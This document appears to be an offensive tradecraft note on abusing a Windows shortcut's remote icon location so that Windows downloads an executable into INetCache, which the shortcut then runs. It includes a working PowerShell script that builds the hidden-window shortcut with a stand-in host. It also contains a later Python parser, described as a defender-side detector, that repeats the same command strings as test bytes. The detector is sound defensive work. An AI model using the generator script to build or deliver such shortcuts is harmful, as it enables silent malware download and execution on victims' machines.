Using LNK to Automatically Download Payloads

LNK (Windows shortcut) files can load their icon from an external location. Specifically, a shortcut can load .ico files specified by a UNC path or even by a URL. In short, if you supply a remote, external icon file, Windows will fetch and download it so that the icon can be displayed.

When the file is fetched by the LNK file, it is stored in the path %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache\file.exe

The LNK can then execute the file in this directory.

An example script for generating the file is shown below:

$shell = New-Object -ComObject WScript.Shell;
$desktop = [System.Environment]::GetFolderPath('Desktop');
$shortcut = $shell.CreateShortcut("$desktop\file.lnk");
$shortcut.TargetPath = "C:\windows\system32\conhost.exe";
$shortcut.WindowStyle = 7;
$shortcut.Arguments = 'cmd.exe /c cd %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache & dir /s /B file*.exe | cmd.exe /k';
$shortcut.IconLocation = "https://127.0.0.1/file.exe?.ico";
$shortcut.Save();
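
A defender-side check for the shortcut described above, added here as an example (it is not code from the original page): it reads the StringData section of a .lnk following the MS-SHLLINK layout and flags a remote icon location and arguments that reference INetCache. The function names and the constructed sample bytes are assumptions, as is the icon path being stored in the ICON_LOCATION string.

```python
import struct

# LinkFlags bits (MS-SHLLINK) that decide which optional sections follow the header
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]

def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields present in a shell link, keyed by name."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link header")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                    # fixed header size
    if flags & HAS_IDLIST:                      # 2-byte size, then the ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                    # 4-byte size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    out = {}
    for bit, name in STRING_FIELDS:             # fields appear in this fixed order
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # length in characters
        end = pos + 2 + count * width
        out[name] = data[pos + 2:end].decode(codec, "replace")
        pos = end
    return out

def triage(fields: dict) -> list:
    """Flag the two traits of the shortcut this page describes."""
    findings = []
    icon = fields.get("icon_location", "").lower()
    if icon.startswith(("http://", "https://", "\\\\")):
        findings.append("remote icon location")
    if "inetcache" in fields.get("arguments", "").lower():
        findings.append("arguments reference INetCache")
    return findings

def build_sample() -> bytes:
    """Constructed test bytes: zeroed header fields, arguments and icon strings only."""
    flags = 0x20 | 0x40 | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, bytes(16), flags) + bytes(52)
    strings = b""
    for s in (r"cmd.exe /c cd %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache",
              "https://127.0.0.1/file.exe?.ico"):
        strings += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + strings
```

Run `triage(parse_lnk_strings(open(path, "rb").read()))` over shortcuts collected from mail attachments, archives or user profiles; a local icon path with ordinary arguments returns an empty list.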
